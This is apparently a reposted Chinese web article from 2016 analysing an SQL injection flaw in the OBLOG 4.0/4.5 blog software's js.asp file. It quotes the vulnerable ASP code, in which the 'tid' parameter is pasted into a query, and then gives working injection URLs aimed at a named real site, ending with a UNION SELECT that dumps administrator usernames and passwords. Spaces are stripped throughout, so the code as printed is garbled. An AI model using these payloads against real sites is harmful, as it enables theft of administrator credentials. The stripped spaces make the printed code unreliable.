OBLOG4.0 OBLOG4.5漏洞利用分析
OBLOG4.0 OBLOG4.5漏洞利用分析
发布时间:2016-12-29 来源:查字典编辑
摘要:来源:DeepenStudy漏洞文件:js.asp

来源:DeepenStudy

漏洞文件:js.asp

<%

Dimoblog

setoblog=newclass_sys

oblog.autoupdate=False

oblog.start

dimjs_blogurl,n

js_blogurl=Trim(oblog.CacheConfig(3))

n=CInt(Request(”n”))

ifn=0thenn=1

selectcaseCInt(Request(”j”))

case1

calltongji()

case2

calltopuser()

case3

calladduser()

case4

calllistclass()

case5

callshowusertype()

case6

calllistbestblog()

case7

callshowlogin()

case8

callshowplace()

case9

callshowphoto()

case10

callshowblogstars()

Case11

Callshow_hotblog()

Case12

Callshow_teams()

Case13

Callshow_posts()

Case14

Callshow_hottag()

case0

callshowlog()

endselect

****************省略部分代码******************

Subshow_posts()

Dimteamid,postnum,l,u,t

teamid=Request(”tid”)

postnum=n

l=CInt(Request(”l”))

u=CInt(Request(”u”))

t=CInt(Request(”t”))

Dimrs,sql,sRet,sAddon

Sql=”selectTop”&postnum&”teamid,postid,topic,addtime,author,useridFromoblog_teampostWhereidepth=0andisdel=0”

Ifteamid<>“”Andteamid<>“0″Then

teamid=Replace(teamid,”|”,”,”)

Sql=Sql&”AndteamidIn(”&teamid&“)”

EndIf

Sql=Sql&”orderbypostidDesc”

Setrs=oblog.Execute(Sql)

sRet=”

DoWhileNotrs.Eof

sAddon=”"

*sRet=sRet&“”&oblog.Filt_html(Left(rs(2),l))&“”

Ifu=1ThensAddon=rs(4)

ift=1Then

IfsAddon<>“”ThensAddon=sAddon&“,”

sAddon=sAddon&rs(3)

EndIf

IfsAddon<>“”ThensAddon=”(”&sAddon&“)”

sRet=sRet&sAddon&“

rs.Movenext

Loop

Setrs=Nothing

sRet=sRet&“

Response.writeoblog.htm2js(sRet,True)

EndSub

调用show_posts()过程必须要符合上面的参数n=1,j=13

(”&teamid&“)

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=1and(1=1返回正常

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=1and(1=2返回异常

猜管理员表名

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and查询语句and(1=1

Sql=”selectTop”&postnum&”teamid,postid,topic,addtime,author,useridFromoblog_teampostWhereidepth=0andisdel=0”

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=2unionselect1,2,3,4,5,6fromoblog_adminwhereid=(1

document.write('

*

‘);

gid=1跟pid=2里的1,2就是了直接替换里面的1,2为username,password

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=2unionselectusername,password,3,4,5,6fromoblog_adminwhereid=(1

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新黑客相关学习
热门黑客相关学习
编程开发子分类